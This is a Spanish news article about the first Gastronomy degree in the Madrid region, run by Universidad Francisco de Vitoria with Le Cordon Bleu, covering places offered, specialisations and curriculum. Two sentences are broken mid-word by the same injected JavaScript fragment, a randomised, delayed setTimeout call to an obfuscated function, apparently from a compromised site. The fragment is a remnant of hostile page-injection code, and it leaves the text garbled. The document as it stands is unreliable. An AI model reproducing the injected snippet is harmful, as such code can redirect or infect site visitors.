Nace el Grado en Gastronomía en la Comunidad de Madrid

isoEl curso pasado, la Universidad Francisco de Vitoria y la escuela Le Cordon Bleu de Madrid impartieron el primer Grado en Gastronomía de la Comunidad de Madrid a la que pudieron acceder tan sólo 16 alumnos. Una experiencia que arrancaba aparentemente en silencio y que, tras unos resultados satisfactorios, podemos decir que la gastronomía española entra por la puerta grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande de la Universidad. Este curso han sido un total de 40 plazas las que se han ofertado, 32 para alumnos de nacionalidad española y 8 plazas para nacionalidad extranjera. 

Este Grado cuenta con dos especialidades ‘Mención en Alta Cocina’ y ‘Dirección de Hoteles y Restaurantes’. El contenido curricular está repartido entre el 25% de clases dirigidas desde la escuela Le Cordon Bleu y el 20% al aprendizaje de ‘managment globlal’ con conocimientos en recursos humanos o márketing en torno a la gastronomía.

Otro 20% lo ocupa el ‘managment operativo’. Con la ayuda de directivos mostrarán cómo crear restaurantes temáticos, conocer la materia de turismo gastronómico o manejar una cadena de frío de hostelería. Las humanidades conforman el 15% del grado, valores como el cuidado de la naturaleza o los aspectos sociales a la hora de la compra y el manejo de artículos.

Desde el año 2004 la Universidad Camilo José Cela oferta la Cátedra Ferrán Adrià de Cultura Gastronómica y Ciencias de la Alimentación. Entre sus objetivos figura crear un centro de formación en alimentación y gastronomía aportandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando los conocimientos imprescindibles sobre alimentación, nutrición y gastronomía así como crear líneas de investigación en este campo.

Una apuesta por la gastronomía que en España ronda al 25% del Producto Interior Bruto. Más información en www.ufv.es